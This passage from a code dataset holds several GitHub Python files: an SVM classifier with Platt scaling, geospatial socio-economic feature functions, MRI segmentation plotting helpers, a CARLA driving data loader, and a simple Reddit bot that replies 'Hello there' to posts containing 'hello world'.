d) / det\n err = 0\n for i in range(len(out)):\n p = sigmoid(out[i], A, B)\n pp[i] = p\n t = T[i]\n err -= t * mylog(p) + (1 - t) * mylog(1 - p)\n if err < olderr * (1 + 1e-7):\n labda *= 0.1\n break\n labda *= 10\n if labda > 1e6:\n break\n diff = err - olderr\n scale = 0.5 * (err + olderr + 1)\n if -1e-3 * scale < diff < 1e-7 * scale:\n count += 1\n else:\n count = 0\n olderr = err\n if count == 3:\n break\n self.scale = lambda x: sigmoid(x, A, B)\n\n def fit_multiclass(self, X, y):\n nb_class = np.max(y) + 1\n self.nb_class = nb_class\n alpha_multi, X_multi, b_multi = {}, {}, {}\n scale_multi = {}\n\n for i, j in tqdm(combinations(range(nb_class), 2)):\n ind_i, ind_j = y == i, y == j\n y_ij = y[ind_i + ind_j]\n y_ij[y_ij == i], y_ij[y_ij == j] = -1, 1\n X_ij = X[ind_i + ind_j]\n self.fit(X_ij, y_ij)\n alpha_multi[(i, j)] = self.alpha\n b_multi[(i, j)] = self.b\n X_multi[(i, j)] = self.X\n scale_multi[(i, j)] = self.scale\n\n self.X_multi = X_multi\n self.scale_multi = scale_multi\n self.alpha_multi = alpha_multi\n self.b_multi = b_multi\n\n def predict_multiclass(self, X):\n n = len(X)\n prediction = np.array([[[0., 0.] for _ in range(self.nb_class)] for _ in range(n)])\n\n for i, j in combinations(range(self.nb_class), 2):\n X_ij, alpha_ij, b_ij = self.X_multi[(i, j)], self.alpha_multi[(i, j)], self.b_multi[(i, j)]\n scale_ij = self.scale_multi[(i, j)]\n\n predict_labels_ij = np.einsum('ij,i->j', self.kernel(X_ij, X), alpha_ij) + b_ij\n predict_labels_ij = scale_ij(predict_labels_ij)\n for k in range(n):\n prediction[k][j] += np.array([predict_labels_ij[k], 1])\n prediction[k][i] += np.array([1 - predict_labels_ij[k], 1])\n\n final_prediction = np.zeros(n)\n for k, probs in enumerate(prediction):\n proba = probs[:, 0] / probs[:, 1]\n final_prediction[k] = np.argmax(proba)\n\n return final_prediction\n","repo_name":"geoffroyO/scikit_eco_plus","sub_path":"models/svc.py","file_name":"svc.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14139623139","text":"\"\"\"\nSocio-econ related features.\n\"\"\"\n\n# Imports\nimport pandas as pd\nimport geopandas as gpd\nimport numpy as np\n\n\ndef pop_dens(gdf, gdf_dens,column_name,buffer_size):\n \"\"\"\n Returns a population density value taken from gdf_dens for each point in gdf.\n The value is calculated by taking the weighted average of all density values intersecting \n a buffer arrund the point.\n\n Args: \n - gdf: geodataframe with points in 'geometry' column or in hex format\n - gdf_dens: geodataframe with polygon or hex raster containing population density values\n - column_name: name of column with data of interest\n - buffer_size: buffer_size (radius in m) for buffer around point; if buffer is None \n data must be given in hex\n - APERTURE_SIZE: raster of hex\n\n Returns:\n - gdf_out wich is gdf + a column with population density values\n\n Last update: 21/04/21. By Felix.\n\n \"\"\"\n if buffer_size is not None:\n # create gdf_out\n gdf_out = gdf\n \n # create buffer around points in gdf\n gdf.geometry = gdf.geometry.centroid.buffer(buffer_size)\n\n # calculate buffer area\n buffer_area = 3.1416*(buffer_size**2)\n\n # get density polygons intersecting the buffer\n gdf_joined = gpd.sjoin(gdf,gdf_dens[[column_name,'geometry']],how =\"left\", op=\"intersects\")\n\n # define function that calculates intersecting area of buffer and dens polygons\n def get_inter_area(row):\n try:\n # calc intersection area\n out = (row.geometry.intersection(gdf_dens.geometry[row.index_right])).area\n except:\n # in rows which don't intersect with a raster of the density data (NaN)\n out = 0 \n return out # intersecting area\n\n # calculate shared area of polygons\n gdf_joined['dens_part']=gdf_joined.apply(get_inter_area,axis=1)\n \n # calculate their share in the buffer\n gdf_joined['dens_part']=gdf_joined['dens_part']/buffer_area \n\n # initialise new column in gdf\n gdf_out['feature_pop_density'] = 0\n \n # assign weighted average population dens value to each point in gdf \n for index in gdf_out.index:\n try:\n # multiply pop dens value with dens_part and sum up the parts to get weighted average\n gdf_out.feature_pop_density.loc[index] = sum(gdf_joined.column_name.loc[index]*gdf_joined.dens_part.loc[index])\n except:\n # assign 0 for points that don't intersect the population density raster\n gdf_out.feature_pop_density.loc[index] = 0\n continue\n else:\n # define hex_col name\n #hex_col = 'hex'+str(APERTURE_SIZE)\n hex_col = 'hex_id'\n # merge trips hex with pop dens hex\n gdf2 = gdf_dens.drop(columns={'geometry'})\n gdf_out = gdf.merge(gdf2,left_on = hex_col, right_on = hex_col)\n \n # find trips that don't have hex data and add 0s\n gdf_diff = gdf.merge(gdf2, how = 'outer' ,indicator=True).loc[lambda x : x['_merge']=='left_only']\n gdf_diff[column_name] = 0\n gdf_diff = gdf_diff.drop(columns=\"_merge\")\n \n # add both together and drop unwanted columns\n gdf_out = pd.concat([gdf_out,gdf_diff], ignore_index=True)\n gdf_out = gdf_out.drop(columns={'OBJECTID','GRD_ID','CNTR_ID','Country','Date','Method','Shape_Leng','Shape_Area'})\n gdf_out = gdf_out.rename(columns={column_name:'feature_pop_density'})\n \n print('Calculated population density')\n return gdf_out\n\n\ndef reorganize_social_status(gdf, column_names):\n \"\"\"\n changing the order of the social status numbering\n so that 1 is low and 4 is high (which then alligns with\n other features, such as income)\n \n Args:\n - gdf: geopandas dataframe containing social status data in h3\n - column_names = names of the columns in gdf_si of interest\n Returns: \n - gdf_out which is equal to gdf, but with reorder column col_name[0] \n \n \"\"\"\n gdf.loc[gdf.status_index==1.0,column_names[0]] = 5.0\n gdf.loc[gdf.status_index==2.0,column_names[0]] = 6.0\n gdf.loc[gdf.status_index==3.0,column_names[0]] = 2.0\n gdf.loc[gdf.status_index==4.0,column_names[0]] = 1.0\n gdf.loc[gdf.status_index==5.0,column_names[0]] = 4.0\n gdf.loc[gdf.status_index==6.0,column_names[0]] = 3.0\n gdf_out = gdf.copy()\n return gdf_out\n\n\ndef social_index(gdf,gdf_si,column_names):\n \"\"\"\n Returns the social status as well as the derivative of the social status within a hex of size APERTURE_SIZE.\n\n Args: \n - gdf: geopandas dataframe containing trip data in h3\n - gdf_si: geopandas dataframe containing social status data in h3\n - column_names = names of the columns in gdf_si of interest\n - APERTURE_SIZE: h3 size\n\n Returns:\n - gdf_out wich is gdf + a 2 columns: 'feature_social_status_index', 'feature_social_dynamic_index'\n\n Last update: 21/04/21. By Felix.\n\n \"\"\"\n # define hex_col name\n hex_col = 'hex_id'\n #swith social status data ordering so that it alligns with other features\n gdf_si = reorganize_social_status(gdf_si,column_names)\n\n # merge trips hex with social status hex\n gdf2 = gdf_si.drop(columns={'geometry'})\n gdf_out = gdf.merge(gdf2,left_on = hex_col, right_on = hex_col)\n \n # find trips that don't have hex data and add 0s\n gdf_diff = gdf.merge(gdf2, how = 'outer' ,indicator=True).loc[lambda x : x['_merge']=='left_only']\n gdf_diff[column_names] = np.NaN\n gdf_diff = gdf_diff.drop(columns=\"_merge\")\n \n # add both together and drop unwanted columns\n gdf_out = pd.concat([gdf_out,gdf_diff], ignore_index=True)\n gdf_out = gdf_out.drop(columns={'Unnamed: 0','district','section','area','population','class','class.1','status_dynamic_index'})\n gdf_out = gdf_out.rename(columns={'status_index':'feature_social_status_index','dynamic_index':'feature_social_dynamic_index'})\n \n # turn categorical +, - and +/- into -1,0,1\n gdf_out.loc[gdf_out.feature_social_dynamic_index == '+', 'feature_social_dynamic_index'] = 1.0\n gdf_out.loc[gdf_out.feature_social_dynamic_index == '+/-', 'feature_social_dynamic_index'] = 0.0\n gdf_out.loc[gdf_out.feature_social_dynamic_index == '-', 'feature_social_dynamic_index'] = -1.0\n # convert to numeric\n gdf_out.feature_social_dynamic_index = pd.to_numeric(gdf_out.feature_social_dynamic_index)\n \n print('Calculated social status')\n return gdf_out\n\ndef transit_dens(gdf,gdf_transit,column_name):\n \"\"\"\n Returns the number of transit stations inside of hexagons.\n\n Args: \n - gdf: geopandas dataframe containing trip data in h3\n - gdf_transit: geopandas dataframe containing number of transit stos in h3\n - column_name = names of the column in gdf_transit of interest\n - APERTURE_SIZE: h3 size\n\n Returns:\n - gdf_out wich is gdf + 1 column: 'feature_transit_density'\n\n Last update: 11/05/21. By Felix.\n\n \"\"\" \n hex_col = 'hex_id'\n # merge trips hex with pop dens hex\n gdf2 = gdf_transit.drop(columns={'geometry'})\n gdf_out = gdf.merge(gdf2,left_on = hex_col, right_on = hex_col)\n\n # find trips that don't have hex data and add 0s\n gdf_diff = gdf.merge(gdf2, how = 'outer' ,indicator=True).loc[lambda x : x['_merge']=='left_only']\n gdf_diff[column_name] = 0\n gdf_diff = gdf_diff.drop(columns=\"_merge\")\n\n # add both together and drop unwanted columns\n gdf_out = pd.concat([gdf_out,gdf_diff], ignore_index=True)\n gdf_out = gdf_out.drop(columns={'lat','lng'})\n gdf_out = gdf_out.rename(columns={column_name:'feature_transit_density'})\n print('Calculated transit density')\n return gdf_out\n\ndef income(gdf,gdf_si,column_names):\n \"\"\"\n Returns the income within a hex of size APERTURE_SIZE. The income is the weighted average income per plz.\n The weighted average income is calculated based on categories 1-7, derived from Axciom data.\n\n Args: \n - gdf: geopandas dataframe containing trip data in h3\n - gdf_si: geopandas dataframe containing income data in h3\n - column_names = names of the columns in gdf_si of interest\n - APERTURE_SIZE: h3 size\n\n Returns:\n - gdf_out wich is gdf + column: 'feature_income'\n\n Last update: 21/04/21. By Felix.\n\n \"\"\"\n # define hex_col name\n #hex_col = 'hex'+str(APERTURE_SIZE)\n hex_col = 'hex_id'\n # merge trips hex with pop dens hex\n gdf2 = gdf_si.drop(columns={'geometry'})\n gdf_out = gdf.merge(gdf2,left_on = hex_col, right_on = hex_col)\n \n # find trips that don't have hex data and add 0s\n gdf_diff = gdf.merge(gdf2, how = 'outer' ,indicator=True).loc[lambda x : x['_merge']=='left_only']\n gdf_diff[column_names] = np.NaN\n gdf_diff = gdf_diff.drop(columns=\"_merge\")\n \n # add both together and drop unwanted columns\n gdf_out = pd.concat([gdf_out,gdf_diff], ignore_index=True)\n gdf_out = gdf_out.drop(columns={'plz','ph_to','stat_1u2', 'stat_3','stat_4','stat_5','stat_6','stat_7','stat_8u9','mean'})\n gdf_out = gdf_out.rename(columns={'weigthed_mean':'feature_income'})\n \n print('Calculated income status')\n return gdf_out\n","repo_name":"wagnerfe/xml4urbanformanalysis","sub_path":"ufo-map/ufo_map/Feature_engineering/socio_econ.py","file_name":"socio_econ.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"1681114010","text":"'''\nCreated on 21. apr. 2021\n\n@author: Bruger\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.preprocessing.image import img_to_array, load_img\nimport skimage.feature\nfrom itertools import count\nfrom Tools.scripts.objgraph import flat\n\n#Helper to plot image and mask pair\ndef plot_img_mask(img_path,mask_path):\n \n img = load_img(img_path)\n img_arr = img_to_array(img)\n img_arr /= 255.\n \n plt.figure()\n plt.imshow(img_arr,cmap='gray')\n \n \n #maskImg=load_img(mask_path, color_mode=\"grayscale\")\n #maskImg=np.expand_dims(maskImg, 2)\n \n maskImg=plt.imread(mask_path)\n plt.figure()\n plt.imshow(maskImg,cmap='gray')\n \n plt.show()\n\ndef plot_training_history(history):\n \n #Plot performance from training\n #TODO: Consider plotting dice measure\n #acc = history.history['acc']\n #val_acc = history.history['val_acc']\n #plt.plot(epochs, acc, 'bo', label='Training acc')\n #plt.plot(epochs, val_acc, 'b', label='Validation acc')\n #plt.title('Training and validation accuracy')\n #plt.legend()\n \n \n loss = history.history['loss']\n val_loss = history.history['val_loss']\n epochs = range(1, len(loss) + 1)\n \n plt.figure()\n plt.plot(epochs, loss, 'bo', label='Training loss')\n plt.plot(epochs, val_loss, 'b', label='Validation loss')\n plt.title('Training and validation loss')\n plt.legend()\n plt.show(block=False)\n\n#Method to plot mask on top of MR image\ndef plot_predictionsv2(predictions, generator,batch_to_show):\n \n mri_img, mask = generator.__getitem__(batch_to_show) #getitem input is batchindex.\n batch_size = generator.batch_size\n for i in range(batch_size):\n # load predicted mask\n predicted_mask = predictions[i+batch_size*batch_to_show]\n rounded = np.round(predicted_mask,0) #rounds the array to integers.\n \n # load MRI \n mr_img_arr = mri_img[i] #Added to plot preprocessed MRI\n \n # load ground truth mask\n mask_arr = mask[i]#ADDED to plot preprocessed MRI\n \n # beregner edges for ground thruth masken\n edges_gt = skimage.feature.canny(\n image=np.squeeze(mask_arr),\n sigma=1,\n low_threshold=0.1,\n high_threshold=0.9,\n ) #shape = 512,512\n # beregner edges for den predicterede maske\n edges_pred = skimage.feature.canny(\n image=np.squeeze(rounded),\n sigma=1,\n low_threshold=0.1,\n high_threshold=0.9,\n ) #shape = 512,512\n # rgb for roed er (255,0,0)\n #laver ground truth maske i roede farver.\n Mask_gt_pred = np.zeros((512,512,3))\n for l in range(0,512):\n for w in range(0,512):\n if edges_gt[l,w]==True:\n Mask_gt_pred[l,w,:] = [255,0,0] #red\n \n \n for l in range(0,512):\n for w in range(0,512):\n if edges_pred[l,w]==True:\n Mask_gt_pred[l,w,:] = [0,255,0] #green\n # plot mr billede\n plt.figure()\n pic = mr_img_arr+Mask_gt_pred\n plt.imshow(pic)\n plt.title('MRI, ground thruth is red and prediction is green')\n\n plt.show() \ndef plot_predictions(predictions, input_img_paths, mask_paths):\n #Selected slice to compare\n i = 5;\n #Plots \n #plt.subplot(1,2,1)\n predicted_mask = predictions[i]\n rounded = np.round(predicted_mask,0)\n plt.figure()\n plt.imshow(rounded,cmap='gray')\n \n #plt.subplot(1,2,2)\n #Print paths to ensure that they match\n print(\"input path: \" + input_img_paths[i])\n print(\"mask path: \" + mask_paths[i])\n \n #Plot MRI and mask via utility module\n plot_img_mask(input_img_paths[i], mask_paths[i])\n \n #Plot mask alone\n #maskImg=plt.imread(mask_paths[i])\n #plt.imshow(maskImg,cmap='gray')\n #plt.show()\n \ndef make_boxplot_plot(dice):\n plt.figure()\n plt.boxplot(np.asarray(dice))\n plt.title('Boxplot of DICE pr. image. Total images: %d'%(len(dice)))\n plt.xlabel(\"Batch nr.\")\n plt.ylabel(\"Dice score\")\n plt.ylim(0,1)\n #plt.show()\n\ndef make_maskSize_vs_DICE_plot(dice,maskSize):\n flattenDice = [item for sublist in dice for item in sublist]\n \n plt.figure()\n plt.scatter(maskSize,flattenDice)\n plt.title('Plot GT mask size vs DICE pr. image. Total batches: %d . Total images: %d'%(len(dice),len(flattenDice)))\n plt.xlabel(\"Mask size, in proportion of total img\")\n plt.ylabel(\"Dice score\")\n \n #obtain m (slope) and b(intercept) of linear regression line\n m, b = np.polyfit(maskSize,flattenDice, 1)\n \n #add linear regression line to scatterplot \n plt.plot(maskSize, m*np.array(maskSize)+b, color=\"red\")\n textStr = \"Regression: y=%2.3f x + %1.3f\"%(m,b)\n plt.text(0.03, 0, textStr)\n ","repo_name":"nthostrup/ST8","sub_path":"Project_modules/plotting_module.py","file_name":"plotting_module.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9988049296","text":"import os\nimport json\nimport argparse\nimport cv2\nimport numpy as np\nfrom pathlib import Path\nfrom PIL import Image\n\nimport torch\nfrom torch.utils.data import Dataset\n\nfrom driving_agents.king.aim_bev.training_utils import augment_all, get_crop_offsets, transform_2d_points\n\n# Global Flags\nPIXEL_SHIFT = 14\nPIXELS_AHEAD_VEHICLE = 96 + PIXEL_SHIFT\n\n\ndef build_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset_name', type=str)\n parser.add_argument('--dataset_load_path', type=str)\n parser.add_argument('--dataset_save_path', type=str)\n parser.add_argument('--do_augmentation', type=int, default=1)\n parser.add_argument('--aug_max_rotation', type=float, default=20, help='Max rotation angle [degree] for augmentation. 0.0 equals to no agmentation.')\n parser.add_argument('--seq_len', type=int, default=1, help='Input sequence length (factor of 10).')\n parser.add_argument('--pred_len', type=int, default=4, help='Number of timesteps to predict.')\n\n return parser\n\n\nclass CARLA_Data(Dataset):\n \"\"\"\n Dataset class for topdown maps and vehicle control in CARLA.\n \"\"\"\n def __init__(self, args, root, aug_max_rotation=0.0, create_webdataset=False):\n\n self.args = args\n\n self.seq_len = args.seq_len\n self.pred_len = args.pred_len\n\n self.create_webdataset = create_webdataset\n\n self.target_im_size = args.target_im_size # (192, 192)\n\n self.aug_max_rotation = aug_max_rotation\n\n self.bev = []\n self.x = []\n self.y = []\n self.brake_seq = []\n self.x_old = []\n self.y_old = []\n self.x_command = []\n self.y_command = []\n self.command = []\n self.theta = []\n self.theta_old = []\n self.speed = []\n self.steer = []\n self.throttle = []\n self.brake = []\n self.light = []\n\n # get offsets for bigger crop in case we augment the BEVs\n self.offsets = get_crop_offsets(self.aug_max_rotation, self.target_im_size)\n for root_ix, sub_root in enumerate(root):\n sub_root_k = sub_root.replace('kchitta31', 'krenz73')\n Path(sub_root_k).mkdir(parents=True, exist_ok=True)\n preload_file = os.path.join(sub_root_k, 'pl_'+str(self.seq_len)+'_'+str(self.pred_len)+'bev_planner.npy')\n\n # dump to npy if no preload\n if not os.path.exists(preload_file):\n preload_bev = []\n preload_x = []\n preload_y = []\n preload_x_old = []\n preload_y_old = []\n preload_brake_seq = []\n preload_x_command = []\n preload_y_command = []\n preload_command = []\n preload_theta = []\n preload_theta_old = []\n preload_speed = []\n preload_steer = []\n preload_throttle = []\n preload_brake = []\n preload_light = []\n\n # list sub-directories in root\n root_files = os.listdir(sub_root)\n\n routes = [folder for folder in root_files if not os.path.isfile(os.path.join(sub_root,folder))]\n\n for route in routes:\n route_dir = os.path.join(sub_root, route)\n file_list = os.listdir(route_dir+\"/topdown/\")\n file_list.sort()\n measurement_file_list = os.listdir(route_dir+\"/measurements/\")\n measurement_file_list.sort()\n\n if len(file_list) == 0 or len(measurement_file_list) == 0:\n print(f'Skip: {route_dir}')\n continue\n\n _factor = -(-len(measurement_file_list) // len(file_list)) #ceiling division\n\n _recording_freq_mult = self.args.king_data_fps // 2\n\n _usable_measurements = len(measurement_file_list) - int(self.pred_len * _recording_freq_mult) - 1\n\n _usable_images = _usable_measurements // _factor\n\n num_seq = _usable_images // self.seq_len\n for seq in range(1,num_seq-1):\n bev = []\n xs = []\n ys = []\n thetas = []\n speeds = []\n steer = []\n throttle = []\n brake = []\n brake_seq = []\n light = []\n\n for i in range(self.seq_len):\n # segmentation images\n filename_topdown = file_list[seq*self.seq_len+i]\n filename = file_list[seq*self.seq_len+i].split(\".\")[0].split(\"_\")[1]\n bev.append(route_dir+\"/topdown/\"+filename_topdown)\n\n # position\n with open(route_dir + f\"/measurements/{filename}.json\", \"r\") as read_file:\n data = json.load(read_file)\n xs.append(data['x'])\n ys.append(data['y'])\n brake_seq.append(data['brake'])\n thetas.append(data['theta'])\n speeds.append(data['speed'])\n steer.append(data['steer'])\n throttle.append(data['throttle'])\n brake.append(data['brake'])\n light.append(data['light_hazard'])\n\n\n filename_prev = file_list[seq*self.seq_len-_recording_freq_mult].split(\".\")[0].split(\"_\")[1]\n with open(route_dir + f\"/measurements/{filename_prev}.json\", \"r\") as read_file_prev:\n data_prev = json.load(read_file_prev)\n\n preload_command.append([data_prev['command'], data['command']])\n\n # get control value of final frame in sequence\n preload_x_command.append(data['x_command'])\n preload_y_command.append(data['y_command'])\n preload_x.append([wp[0] for wp in data['waypoints']])\n preload_y.append([wp[1] for wp in data['waypoints']])\n preload_theta.append([wp[2] for wp in data['waypoints']])\n\n # read files sequentially (future frames)\n curr_file_index = int(filename)\n for i in range(self.seq_len, self.seq_len + self.pred_len):\n\n with open(route_dir + f\"/measurements/{str(curr_file_index+i * _recording_freq_mult).zfill(4)}.json\", \"r\") as read_file:\n data = json.load(read_file)\n xs.append(data['x'])\n ys.append(data['y'])\n brake_seq.append(data['brake'])\n\n # fix for theta=nan in some measurements\n if np.isnan(data['theta']):\n thetas.append(0)\n else:\n thetas.append(data['theta'])\n\n preload_bev.append(bev)\n\n preload_x_old.append(xs)\n preload_y_old.append(ys)\n preload_brake_seq.append(brake_seq)\n preload_theta_old.append(thetas)\n preload_speed.append(speeds)\n preload_steer.append(steer)\n preload_throttle.append(throttle)\n preload_brake.append(brake)\n preload_light.append(light)\n\n # dump to npy\n preload_dict = {}\n preload_dict['bev'] = preload_bev\n preload_dict['x'] = preload_x_old\n preload_dict['y'] = preload_y_old\n preload_dict['brake_seq'] = preload_brake_seq\n preload_dict['x_old'] = preload_x_old\n preload_dict['y_old'] = preload_y_old\n preload_dict['x_command'] = preload_x_command\n preload_dict['y_command'] = preload_y_command\n preload_dict['command'] = preload_command\n preload_dict['theta'] = preload_theta_old\n preload_dict['theta_old'] = preload_theta_old\n preload_dict['speed'] = preload_speed\n preload_dict['steer'] = preload_steer\n preload_dict['throttle'] = preload_throttle\n preload_dict['brake'] = preload_brake\n preload_dict['light'] = preload_light\n np.save(preload_file, preload_dict)\n\n # load from npy if available\n preload_dict = np.load(preload_file, allow_pickle=True)\n self.bev += preload_dict.item()['bev']\n self.x += preload_dict.item()['x']\n self.y += preload_dict.item()['y']\n self.brake_seq += preload_dict.item()['brake_seq']\n self.x_old += preload_dict.item()['x_old']\n self.y_old += preload_dict.item()['y_old']\n self.x_command += preload_dict.item()['x_command']\n self.y_command += preload_dict.item()['y_command']\n self.command += preload_dict.item()['command']\n self.theta += preload_dict.item()['theta']\n self.theta_old += preload_dict.item()['theta_old']\n self.speed += preload_dict.item()['speed']\n self.steer += preload_dict.item()['steer']\n self.throttle += preload_dict.item()['throttle']\n self.brake += preload_dict.item()['brake']\n self.light += preload_dict.item()['light']\n\n def __len__(self):\n \"\"\"Returns the length of the dataset. \"\"\"\n return len(self.bev)\n\n def __getitem__(self, index):\n \"\"\"Returns the item at index idx. \"\"\"\n data = dict()\n data['bev'] = []\n\n seq_bev = self.bev[index]\n seq_x = self.x[index]\n seq_y = self.y[index]\n seq_x_old = self.x_old[index]\n seq_y_old = self.y_old[index]\n seq_theta = self.theta[index]\n seq_theta_old = self.theta_old[index]\n\n if self.args.do_augmentation and self.aug_max_rotation!=0:\n no_augment = np.random.randint(2) # we augment 50% of the samples\n else:\n no_augment = 1\n\n for i in range(self.seq_len):\n\n self.angle = torch.tensor([0.0]) # we don't want to augment now -> this would be static. We augment in the Webdatset dataloader dynamically.\n crop = load_crop_bev_png(seq_bev[i], self.args.do_augmentation, self.offsets, self.target_im_size, 'Encoded_cropped')\n\n #only needed for normal dataloader not for webdataset\n crop=np.moveaxis(crop,0,2)\n\n crop = cv2.cvtColor(crop, cv2.COLOR_RGB2BGR)\n crop=np.moveaxis(crop,2,0)\n\n data['bev'].append(crop)\n\n # fix for theta=nan in some measurements\n if np.isnan(seq_theta[i]):\n seq_theta[i] = 0.\n if np.isnan(seq_theta_old[i]):\n seq_theta_old[i] = 0.\n\n ego_x = seq_x[i]\n ego_y = seq_y[i]\n ego_theta = seq_theta[i]\n\n # ##### waypoint processing to local coordinates\n waypoints = []\n # we use the future position of the expert as gt\n for i in range(len(seq_x)):\n # waypoint is the transformed version of the origin in local coordinates\n # we use 90-theta instead of theta\n # LBC code uses 90+theta, but x is to the right and y is downwards here\n local_waypoint = transform_2d_points(np.zeros((1,3)),\n np.pi/2-seq_theta[i], -seq_x[i], -seq_y[i], np.pi/2-ego_theta-self.angle.item(), -ego_x, -ego_y)\n waypoints.append(tuple(local_waypoint[0,:2]))\n\n data['waypoints'] = waypoints\n # convert x_command, y_command to local coordinates\n # taken from LBC code (uses 90+theta instead of theta),\n # see https://github.com/dotchen/LearningByCheating\n local_command_point = []\n R = np.array([\n [np.cos(np.pi/2+ego_theta+self.angle.item()), -np.sin(np.pi/2+ego_theta+self.angle.item())],\n [np.sin(np.pi/2+ego_theta+self.angle.item()), np.cos(np.pi/2+ego_theta+self.angle.item())]\n ])\n local_command_point = np.array([self.x_command[index]-ego_x, self.y_command[index]-ego_y])\n local_command_point = R.T.dot(local_command_point)\n\n data['target_point'] = tuple(local_command_point)\n data['steer'] = self.steer[index]\n data['throttle'] = self.throttle[index]\n data['brake'] = self.brake[index]\n data['brake_seq'] = self.brake_seq[index]\n data['light'] = self.light[index]\n data['speed'] = self.speed[index]\n data['theta'] = self.theta[index]\n data['seq_x'] = seq_x\n data['seq_y'] = seq_y\n data['seq_theta'] = seq_theta\n data['seq_x_old'] = seq_x_old\n data['seq_y_old'] = seq_y_old\n data['seq_theta_old'] = seq_theta_old\n data['x_command'] = self.x_command[index]\n data['y_command'] = self.y_command[index]\n data['command'] = self.command[index]\n data['no_aug'] = no_augment\n\n data['y_offset'] = self.offsets['y_offset']\n data['x_offset_pos'] = self.offsets['x_offset_pos']\n data['x_offset_neg'] = self.offsets['x_offset_neg']\n data['target_im_size'] = self.target_im_size\n data['aug_max_rotation'] = self.aug_max_rotation\n data['bev'] = data['bev'][0] # we just use a single frame\n data = augment_all(data, channels=4)\n\n return data\n\n\ndef load_crop_bev_png(filename, do_augment, offsets, target_im_size, bev_type):\n \"\"\"\n Load and crop an Image.\n Crop depends on augmentation angle.\n \"\"\"\n if do_augment == 0:\n offsets=None\n\n # load png image\n image = Image.open(filename)\n bev_array = np.array(image)\n bev_array = np.moveaxis(bev_array, 2, 0)\n\n if bev_type == 'Encoded_cropped' or bev_type=='Org_cropped':\n cropped_image = crop_bev(bev_array, target_im_size, offsets)\n else:\n cropped_image = bev_array\n\n return cropped_image\n\ndef crop_bev(array, target_im_size, offsets=None):\n if offsets is not None:\n y_offset = offsets['y_offset']\n x_offset_pos = offsets['x_offset_pos']\n x_offset_neg = offsets['x_offset_neg']\n PIXELS_AHEAD_VEHICLE = 96 + PIXEL_SHIFT\n else:\n y_offset = 0\n x_offset_pos = 0\n x_offset_neg = 0\n if array.shape[1] == target_im_size[0]:\n PIXELS_AHEAD_VEHICLE = 0\n else:\n PIXELS_AHEAD_VEHICLE = 96 + PIXEL_SHIFT\n\n\n (width, height) = (array.shape[1], array.shape[2])\n crop_x = int(target_im_size[0]) + x_offset_neg + x_offset_pos\n crop_y = int(target_im_size[1]) + y_offset * 2\n\n start_x = height//2 - target_im_size[0]//2 # this would be central crop\n start_x = start_x - PIXELS_AHEAD_VEHICLE # this would be the 'normal' shifted crop\n start_x = start_x - x_offset_pos # bigger crop for augmentation\n start_y = width//2 - target_im_size[1]//2 - y_offset\n cropped_image = array[:, start_x:start_x+crop_x, start_y:start_y+crop_y]\n return cropped_image","repo_name":"autonomousvision/king","sub_path":"driving_agents/king/aim_bev/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":15426,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"52"} +{"seq_id":"30181814647","text":"import praw\nimport re\nimport os\nimport sys\n\n\nclass HelloBot:\n \"\"\"\n A reddit bot that scans the 5 hottest submissions in a subreddit and\n replies to all posts containing the string 'hello world' with\n 'Hello there!'.\n \"\"\"\n def __init__(self):\n \"\"\"\n Initialize Hello bot, loading in its list of posts to ignore and\n preparing an instance of praw.Reddit\n \"\"\"\n self._reddit = praw.Reddit('hello_bot')\n\n # Initialize or load a list containing the posts Hellobot should ignore\n if not os.path.isfile('posts_replied_to.txt'):\n self._posts_replied_to = []\n else:\n with open('posts_replied_to.txt', 'r') as f:\n post_string = f.read()\n self._posts_replied_to = post_string.split(\"\\n\")\n self._posts_replied_to = \\\n list(filter(None, self._posts_replied_to))\n\n def _update_replied_to(self):\n \"\"\" Update the file list of posts hellobot has replied to \"\"\"\n with open('posts_replied_to.txt', 'w') as f:\n for post_id in self._posts_replied_to:\n f.write(post_id + '\\n')\n\n def _reply_to_post(self, post):\n \"\"\"\n First, check to see if the post is a comment or submission, then\n reply if its text contains 'hello world' and hellobot hasn't\n already replied!\n\n :param post: The post that hellobot will parse and maybe reply to\n :type post: praw.Submission || praw.Comment\n \"\"\"\n\n if isinstance(post, praw.models.Submission):\n post_text = post.selftext\n else:\n post_text = post.body\n\n if post.id not in self._posts_replied_to and \\\n re.search('hello world', post_text, re.IGNORECASE):\n\n post.reply('Hello there, /u/%s!' % post.author.name)\n self._posts_replied_to.append(post.id)\n\n def _check_comment_tree(self, submission):\n \"\"\"\n Iterate over a submission's comment tree, replying to each\n applicable comment.\n\n :param submission: The comment tree to iterate over\n :type submission: praw.Submission\n \"\"\"\n # Get rid of 'uncollapsed' comments\n submission.comments.replace_more(limit=0)\n\n comment_queue = submission.comments[:]\n while comment_queue:\n comment = comment_queue.pop(0)\n comment_queue.extend(comment.replies)\n\n self._reply_to_post(comment)\n\n def say_hello(self, subreddit):\n \"\"\"\n Iterate through the 5 hottest submissions in a given subreddit\n and have hellobot say hello to any posts (comments OR submissions)\n containing the string 'hello world'.\n\n :param subreddit: The subreddit to check\n :type subreddit: str\n \"\"\"\n for submission in self._reddit.subreddit(subreddit).hot(limit=5):\n self._reply_to_post(submission)\n self._check_comment_tree(submission)\n self._update_replied_to()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n subreddit = sys.argv[1]\n else:\n print(\"Invalid arguments given; defaulting to subreddit r/neeerp\")\n subreddit = 'neeerp'\n\n hello_bot = HelloBot()\n hello_bot.say_hello(subreddit)\n","repo_name":"neeerp/HelloBot","sub_path":"hello_bot.py","file_name":"hello_bot.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23272485175","text":"class Matrix:\n def __init__(self, size=None, n=\"\"):\n self.ok = True\n if size:\n (self.rows, self.columns) = size\n else:\n rows, columns = input(\"Enter size of \" + n + \"matrix:\").split()\n self.rows, self.columns = int(rows), int(columns)\n self.size = (self.rows, 